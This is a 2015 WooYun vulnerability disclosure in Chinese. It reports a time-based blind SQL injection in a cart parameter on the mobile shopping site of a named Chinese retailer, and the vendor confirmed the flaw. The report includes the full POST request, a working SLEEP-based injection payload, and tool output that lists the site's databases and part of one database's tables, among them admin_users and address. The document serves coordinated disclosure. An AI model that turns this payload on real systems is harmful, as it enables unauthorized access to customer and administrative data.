快乐购物某站SQL注射涉及大量数据库

发表于 2015年06月09日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0119279

漏洞标题：快乐购物某站SQL注射涉及大量数据库

相关厂商：快乐购物股份有限公司

漏洞作者：紫霞仙子

提交时间：2015-06-09 16:08

公开时间：2015-07-25 09:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签：

漏洞详情

披露状态：

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-10: 厂商已经确认，细节仅向厂商公开
2015-06-20: 细节向核心白帽子及相关领域专家公开
2015-06-30: 细节向普通白帽子公开
2015-07-10: 细节向实习白帽子公开
2015-07-25: 细节向公众公开

简要描述：

233

详细说明：

这个站和主站比了下，怎么比主站的数据量还大啊！！！<br>
post的几个参数都检查下，这里只演示一个参数。POST /order/cartsave.php HTTP/1.1<br>
Content-Length: 228<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Requested-With: XMLHttpRequest<br>
Referer: 3g.happigo.com<br>
Cookie:<br>
Host: 3g.happigo.com<br>
Connection: Keep-alive<br>
Accept-Encoding: gzip,deflate<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36<br>
Accept: */*delcartbtn0=%e5%88%a0%e9%99%a4&cart_rec_id0=ad&goodsnum702256=1&goods_total=1&specid%5b%5d=77999

这个站和主站比了下，怎么比主站的数据量还大啊！！！

post的几个参数都检查下，这里只演示一个参数。POST /order/cartsave.php HTTP/1.1

Content-Length: 228

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: 3g.happigo.com

Cookie:

Host: 3g.happigo.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*delcartbtn0=%e5%88%a0%e9%99%a4&cart_rec_id0=ad&goodsnum702256=1&goods_total=1&specid%5b%5d=77999

漏洞证明：

---<br>
Parameter: cart_rec_id0 (POST)<br>
    Type: AND/OR time-based blind<br>
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br>
    Payload: delcartbtn0=%e5%88%a0%e9%99%a4&cart_rec_id0=ad AND (SELECT * FROM (SELECT(SLEEP(5)))hgCu)&goodsnum702256=1&goods_total=1&specid[]=77999<br>
---<br>
back-end DBMS: MySQL 5.0.12<br>current user: '[email protected][打码]'available databases [16]:<br>
[*] app_manager<br>
[*] goods_admin<br>
[*] information_schema<br>
[*] interface_admin<br>
[*] mysql<br>
[*] orderdb<br>
[*] performance_schema<br>
[*] shenghuofuwu<br>
[*] special<br>
[*] test<br>
[*] touch_manager<br>
[*] tsbd<br>
[*] wap_goods<br>
[*] wap_manager<br>
[*] weixin<br>
[*] zt_manager16个库，涉及mananger的比较多。Database: goods_admin<br>
[335 tables]<br>
+------------------------------------+<br>
| HBP_album                          |<br>
| HBP_brand                          |<br>
| HBP_news                           |<br>
| HBP_news_ext                       |<br>
| HBP_notice                         |<br>
| HBP_pics                           |<br>
| HBP_question                       |<br>
| HBP_video_album                    |<br>
| HBP_videos                         |<br>
| 2014_card                          |<br>
| 2014_order_card_error              |<br>
| 2014_order_card                    |<br>
| 723dongche                         |<br>
| acti_cs                            |<br>
| activity                           |<br>
| activity_dt                        |<br>
| acts                               |<br>
| acts_comments                      |<br>
| acts_comments_count                |<br>
| acts_labels                        |<br>
| acts_to_goods                      |<br>
| acts_to_labels                     |<br>
| add_buy_list                       |<br>
| address                            |<br>
| address_2015                       |<br>
| address_20150105                   |<br>
| address_20150417                   |<br>
| admin_user_oplog                   |<br>
| admin_users                        |<br>
| advertisings                       |<br>
| advertisings_imgs                  |<br>
| article_list                       |<br>
| article_list_ext                   |<br>
| baba_category                      |<br>
| baba_lunbo                         |<br>
| baba_news                          |<br>
| baba_qiandao                       |<br>
| baba_qiandao_info                  |<br>
| baba_voto                          |<br>
| baba_voto_info                     |<br>
| bank_pay_coupon                    |<br>
| bi_all_channel_order_goods_summary |<br>
| bi_goods_summary                   |<br>
| bi_tv_online_goods_info            |<br>
| bigdeal                            |<br>
| blog                               |<br>
| brand_adlist                       |<br>
| brand_category                     |这不多贴出来了。

---

Parameter: cart_rec_id0 (POST)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: delcartbtn0=%e5%88%a0%e9%99%a4&cart_rec_id0=ad AND (SELECT * FROM (SELECT(SLEEP(5)))hgCu)&goodsnum702256=1&goods_total=1&specid[]=77999

---

back-end DBMS: MySQL 5.0.12 current user: '[email protected][打码]'available databases [16]:

[*] app_manager

[*] goods_admin

[*] information_schema

[*] interface_admin

[*] mysql

[*] orderdb

[*] performance_schema

[*] shenghuofuwu

[*] special

[*] test

[*] touch_manager

[*] tsbd

[*] wap_goods

[*] wap_manager

[*] weixin

[*] zt_manager16个库，涉及mananger的比较多。Database: goods_admin

[335 tables]

+------------------------------------+

| HBP_album |

| HBP_brand |

| HBP_news |

| HBP_news_ext |

| HBP_notice |

| HBP_pics |

| HBP_question |

| HBP_video_album |

| HBP_videos |

| 2014_card |

| 2014_order_card_error |

| 2014_order_card |

| 723dongche |

| acti_cs |

| activity |

| activity_dt |

| acts |

| acts_comments |

| acts_comments_count |

| acts_labels |

| acts_to_goods |

| acts_to_labels |

| add_buy_list |

| address |

| address_2015 |

| address_20150105 |

| address_20150417 |

| admin_user_oplog |

| admin_users |

| advertisings |

| advertisings_imgs |

| article_list |

| article_list_ext |

| baba_category |

| baba_lunbo |

| baba_news |

| baba_qiandao |

| baba_qiandao_info |

| baba_voto |

| baba_voto_info |

| bank_pay_coupon |

| bi_all_channel_order_goods_summary |

| bi_goods_summary |

| bi_tv_online_goods_info |

| bigdeal |

| blog |

| brand_adlist |

| brand_category |这不多贴出来了。

修复方案：

这次数据比上次更给力，自评严重性，求20 rank！！！！！

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-06-10 09:48

厂商回复：

谢谢紫霞对快乐购信息安全的支持！

评价

2010-01-01 00:00 酸奶、白帽子 | Rank:77 漏洞数:8)

你关注的白帽子紫霞仙子发表了漏洞快乐购物某站SQL注射涉及大量数据库
2010-01-01 00:00 牛小帅白帽子 | Rank:407 漏洞数:34)

@酸奶、好快啊天天都是sql注入

原文连接：快乐购物某站SQL注射涉及大量数据库 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。